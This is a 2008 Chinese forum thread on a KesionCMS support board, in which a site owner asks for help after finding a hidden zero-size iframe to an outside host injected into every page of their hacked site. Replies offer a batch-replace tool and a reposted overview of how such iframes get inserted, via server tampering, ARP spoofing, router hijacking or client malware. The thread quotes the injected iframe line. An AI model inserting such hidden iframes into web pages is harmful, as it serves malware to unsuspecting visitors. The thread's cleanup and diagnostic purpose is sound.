账号通
    

账号  

密码  

2479

查看

6

回复
主题:网站被黑了。加了一段代码,帮我看看? [收藏主题] 转到:  
lsfdc 当前离线

648

主题

1

广播

0

粉丝
添加关注
级别:六年级

用户积分:6080 分
登录次数:605 次
注册时间:2008/1/14
最后登录:2022/12/14
lsfdc 发表于:2008/3/6 21:09:00   | 只看该作者 查看该作者主题 楼主 
科汛智能建站系统
<iframe src="http://88.881215.com/88.htm" width=0 height=0></iframe>
所有文件都有这样的一段代码!请问这是 科讯程序漏洞 还是服务器本身也有漏洞。 如果设置文件夹权限。需要限制那几个文件夹?
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
zhenfengdz 当前离线

3821

主题

0

广播

1

粉丝
添加关注
级别:大三

用户积分:21733 分
登录次数:436 次
注册时间:2007/1/9
最后登录:2013/4/24
zhenfengdz 发表于:2008/3/7 8:20:00   | 只看该作者 查看该作者主题 沙发 
做在线知识付费 选科汛云开店
有一种情况:没有可替换的,就是说,站点文件里面找不到被嵌入的代码,而页面浏览查看源文件却有嵌入代码,这种情况和主机商说,一会儿就解决。
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
lsfdc 当前离线

648

主题

1

广播

0

粉丝
添加关注
级别:六年级

用户积分:6080 分
登录次数:605 次
注册时间:2008/1/14
最后登录:2022/12/14
lsfdc 发表于:2008/3/7 9:49:00   | 只看该作者 查看该作者主题 藤椅 
科汛在线商城系统(NET)

替换的问题算是解决了,我下载了整站 用 dw 全部替换为空。然后重新上传。

我现在最关心的安全问题是,到底那里有错,是本身科讯程序的漏洞吗??

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
zhenfengdz 当前离线

3821

主题

0

广播

1

粉丝
添加关注
级别:大三

用户积分:21733 分
登录次数:436 次
注册时间:2007/1/9
最后登录:2013/4/24
zhenfengdz 发表于:2008/3/7 8:13:00   | 只看该作者 查看该作者主题 板凳 
科汛在线网校系统
以下是引用lsfdc在2008-3-6 22:03:31的发言:
老大  我没有权利进入你的板块下载阿!!!
 下载信息  [文件大小:2.34 KB 下载次数: 次]
点击下载文件:replace


[此贴子已经被作者于2008-3-7 8:15:22编辑过]

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
yashuk 当前离线

206

主题

0

广播

0

粉丝
添加关注
级别:二年级

用户积分:1768 分
登录次数:76 次
注册时间:2007/12/16
最后登录:2012/10/15
yashuk 发表于:2008/3/7 1:13:00   | 只看该作者 查看该作者主题 报纸 
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
一生有你 当前离线

10439

主题

0

广播

18

粉丝
添加关注
级别:版主

用户积分:72521 分
登录次数:1969 次
注册时间:2006/7/1
最后登录:2021/8/25
一生有你 发表于:2008/3/6 21:25:00   | 只看该作者 查看该作者主题 地板 
科汛在线网校系统
 下载信息
图片点击可在新窗口打开查看点击浏览该文件:iframe批量替换工具.rar

附:网站网页被嵌入iframe的原因(转自网上)

<script type="text/javascript"></script><script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript"></script>

一、问题提出
    这个应该是ARP欺骗吧,我单位机子中过,每打开一个网页上面都被iframe。
    前段时间,浏览我们公司一台服务器上的所有网站,前面都被加上<iframe ....></iframe>,刷新的时候有时候又没有了
   新建测试站点也有相同现象发生
   在同一时间不同地点的客户端浏览有相同现象发生,在服务器上浏览没有这个问题
检查服务器上代码没有发现被修改的痕迹,IIS设置也没有发现加上isapi的痕迹
后来也没有做什么更改,一切又正常了
不知道这到底会是什么问题?不知道在路由器上有无产生这种现象的设置? 
显然,大多数这样的情况是非网站主所为,而是大多被利用来挂马或加载恶意广告所造成,那么有多少途径可以导致网页被插入iframe呢?也就是说有用户浏览你的网站会出现被插入iframe的代码。

二、在网页中插入iframe的可能途径
虽然问题简单,但详细说起来从服务器、传输过程和客户端3个层次来分析。
1、就服务器而言存在的可能:
(1) 直接修改网页插入,现象是网页被改动了。
(2) 通过ISAPI Filter插入,现象是出现了陌生的ISAPI加载项。
(3) 通过IIS的脚注插入,现象是脚注设置被启用了。
(4) 通过网络TDI或NDIS插入,现象是出现了不知名的网络驱动类程序。
2、就传输过程存在的可能:
(1) 路由器被劫持,现象是只要通过某个路由器访问则出现代码,否则就没有。
(2) ARP欺骗,现象是arp表显然不正确。
3、就客户端存在的可能:
(1) 恶意程序或恶意插件,现象是其他机器访问网站就没有被插入代码。

三、问题的解决:
可以先从服务器检查入手,发现可能存在的问题,若排除后则可判定是传输过程中被劫持,若仅仅是个人用户则可能是用户机器中毒造成的,现在好象ARP欺骗也会如此。

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
lsfdc 当前离线

648

主题

1

广播

0

粉丝
添加关注
级别:六年级

用户积分:6080 分
登录次数:605 次
注册时间:2008/1/14
最后登录:2022/12/14
lsfdc 发表于:2008/3/6 22:03:00   | 只看该作者 查看该作者主题 7楼 
科汛在线考试系统(NET)
老大  我没有权利进入你的板块下载阿!!!
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
<上一主题 | 下一主题 >
Powered By KesionCMS Version X1
厦门科汛软件有限公司 © 2006-2016 页面执行0.14063秒 powered by KesionCMS 9.0